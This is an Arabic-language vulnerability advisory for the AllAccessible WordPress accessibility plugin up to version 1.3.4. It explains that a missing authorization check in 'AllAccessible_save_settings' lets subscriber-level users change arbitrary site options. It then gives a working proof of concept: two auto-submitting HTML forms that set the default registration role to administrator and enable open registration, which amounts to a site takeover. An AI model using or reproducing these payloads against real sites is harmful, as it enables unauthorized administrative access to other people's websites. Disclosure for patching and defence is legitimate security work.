
إمكانية الوصول بواسطة AllAccessible <= 1.3.4 - نقص التفويض للمستخدمين الموثقين (مشتركين فما فوق) لتحديث خيار عشوائي
الإضافة Accessibility من AllAccessible <= 1.3.4 - غياب التفويض لتحديث خيارات تعسفي من قبل مستخدمين موثقين (مشترك+)
إضافة Accessibility من AllAccessible لووردبريس معرضة لتعديل غير مصرح به للبيانات يمكن أن يؤدي إلى تصعيد الامتيازات بسبب نقص فحص الصلاحية في دالة 'AllAccessible_save_settings' في جميع الإصدارات حتى 1.3.4. وهذا يمكن المهاجمين الموثقين، الذين لديهم وصول بمستوى المشترك (Subscriber) وما فوق، من تحديث خيارات تعسفية على موقع ووردبريس. يمكن استغلال ذلك لتحديث الدور الافتراضي للتسجيل إلى مدير (administrator) وتمكين تسجيل المستخدمين للمهاجمين للحصول على وصول إداري إلى موقع ضعيف.
سجل الدخول كمشترك ثم استخدم هذه النماذج لجعل الدور الافتراضي مديرًا ثم الثاني للمستخدمين للتسجيل.
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="AllAccessible_save_settings" />
<input type="hidden" name="opt_name" value="default_role" />
<input type="hidden" name="opt_value" value="administrator" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="AllAccessible_save_settings" />
<input type="hidden" name="opt_name" value="users_can_register" />
<input type="hidden" name="opt_value" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>